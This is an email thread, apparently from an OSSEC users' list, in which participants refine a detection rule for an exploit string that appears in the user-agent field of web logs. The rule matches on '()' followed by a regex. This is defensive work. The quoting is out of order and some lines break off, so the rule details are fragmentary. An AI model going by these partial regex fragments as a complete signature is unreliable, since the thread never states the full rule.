Hello Michael,
> Thanks for sharing this. Any specific reason for the '\.+' after the '()'?
You are right, '\.*' is better. Thanks for pointing this out.
> Also, the ':' before ';' is not part of the exploit, so you may want to
remove that.
You are right again, there can be anything before ';'.
On 10/04/2014 05:30 AM, Jan Andrasko wrote:
> Rob,
>
> issue with your rule was that this string is not part of url. It is
> usually in place of user agent, which is not decoded by Ossec. Therefore
> you need to regex whole log message.
>
> Brgds
> Jan
A note about this: I have seen this exploit
Thanks very much, I've added the rule. Appreciate the assistance!
On Sat, Oct 4, 2014 at 9:30 AM, Michael Starks wrote:
> On 10/04/2014 05:30 AM, Jan Andrasko wrote:
> > Rob,
> >
> > issue with your rule was that this string is not part of url. It is
> > usually in place of user agent, which is